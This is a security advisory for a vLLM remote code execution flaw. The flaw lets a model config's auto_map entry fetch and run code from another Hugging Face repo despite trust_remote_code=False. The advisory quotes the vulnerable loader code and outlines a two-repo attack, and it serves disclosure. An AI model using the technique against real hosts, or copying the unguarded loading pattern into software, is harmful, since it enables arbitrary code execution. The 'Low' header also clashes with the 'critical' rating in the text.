Low
osv
·
GHSA-8fr4-5q9j-m8gm
vLLM vulnerable to remote code execution via transformers_utils/get_config
Published Dec 2, 2025
CVSS 3.1
### Summary
`vllm` has a critical remote code execution vector in a config class named `Nemotron_Nano_VL_Config`. When `vllm` loads a model config that contains an `auto_map` entry, the config class resolves that mapping with `get_class_from_dynamic_module(...)` and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the `auto_map` string. Crucially, this happens even when the caller explicitly sets `trust_remote_code=False` in `vllm.transformers_utils.config.get_config`. In practice, an attacker can publish a benign-looking frontend repo whose `config.json` points via `auto_map` to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host.
### Details
The vulnerable code resolves and instantiates classes from `auto_map` entries without checking whether those entries point to a different repo or whether remote code execution is allowed.
```python
class Nemotron_Nano_VL_Config(PretrainedConfig):
model_type = 'Llama_Nemotron_Nano_VL'
def __init__(self, **kwargs):
super().__init__(**kwargs)
if vision_config is not None:
assert "auto_map" in vision_config and "AutoConfig" in vision_config["auto_map"]
# <-- vulnerable dynamic resolution + instantiation happens here
vision_auto_config = get_class_from_dynamic_module(*vision_config["auto_map"]["AutoConfig"].split("--")[::-1])
self.vision_config = vision_auto_config(**vision_config)
else:
self.vision_config = PretrainedConfig()
```
`get_class_from_dynamic_module(...)` is capable of fetching and importing code from the Hugging Face repo specified in the mapping. `trust_remote_code` is not enforced for this code path. As a result, a frontend repo can redirect the loader to any backend repo and cause code execution, bypassing the `trust_remote_code` guard.
### Impact
This is a critical vulnerability because it breaks the documented `trust_remote_code` safety boundary in a core model-loading utility. The vulnerable code lives in a common loading path, so any application, service, CI job, or developer machine that uses `vllm`’s transformer utilities to load configs can be affected. The attack requires only two repos and no user interaction beyond loading the frontend model. A successful exploit can execute arbitrary commands on the host.
### Fixes
* https://github.com/vllm-project/vllm/pull/28126
Affected AI Products
vllm